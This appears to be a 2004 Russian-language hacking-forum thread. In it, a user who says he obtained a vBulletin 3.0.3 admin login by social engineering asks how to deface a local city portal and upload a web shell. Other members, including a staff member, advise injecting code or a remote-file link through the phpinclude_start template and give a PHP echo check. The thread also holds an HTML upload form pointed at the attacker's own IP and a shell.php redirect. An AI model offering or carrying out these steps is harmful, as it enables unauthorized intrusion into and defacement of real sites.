Форумы Дефейс 4ерез Vbulletin 3.0.3

Discussion in 'Уязвимости CMS/форумов' started by ProTeuS, 18 Dec 2004.

  1. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    Я поимел поcтуп к админпанели vBulletin 3.0.3. хо4у сайт дефейснуть, дописываю в шаблоны свой код, но 4е-то он не канает...
    location=myip/shell.php по понятным при4инам работает с правами браузера, а сам шелл залить не могу(виндовая та4ка, wget не идет)
    4то можете посоветовать?
     
  2. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Не надо никакой шел заливать. В щаблонах есть файл phpinclude_start туда можно вставить ссылку на внешний файл. Этого должно быть достаточно.
     
  3. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    А как ты туда доступ поимел, хотелось бы узнать ...
     
  4. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    Нет, ЕГОРЫ4. в phpinclude_stat не канает... только просто в phpinclude. Вот вставил такой код:

    <FORM ENCTYPE="multipart/form-data" ACTION="http://мой айпи/remview.php" METHOD=POST>
    <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="1000000">
    Send this file: <INPUT NAME="userfile" TYPE="file">
    <INPUT TYPE="submit" VALUE="Send File">
    </FORM>

    к сожадению нету где проверить. 4то скажете, воркать(не локально, а открываться в правами на дефейснутой та4ке) будет(я в этом дело абсолютный 0)???

    2 ЧегеВара: Да это я один портал в нешей городской локалек поимел =)
    А там и этот новенький форумеЦ стоит
     
  5. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Вообще то это можно сделать только через phpinclude_start ... не знаю как ты проверял работате он или нет, но обычно проверить можно просто вписав туда типа

    <? echo("12345678"); ?>

    после того как впишешь, это сообщение должно появиться на первой странички вверху
     
  6. Automan

    Automan New Member

    Joined:
    19 Dec 2004
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    ProTeuS - ты это с каким форумом сделал, сэтим что-ли?=)
    Скажи как ты это сделал.
    Если не хочешь делиться забеслпатно своими достяжениями пиши в асю: 313102321, у меня много всего полезного есть, сможем договориться=)
     
  7. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    Ну да, таким макаром на паге это выводит, я просто не знаю какой командой на этой виндовой та4ке шелл залить, или вызвать его как-то, 4тобы открыть ее диски :( Может поможете....

    2 Automan: ну да, vBulletin 3.0.3. И пас я расдобыл 4ичто соЦинженерией :)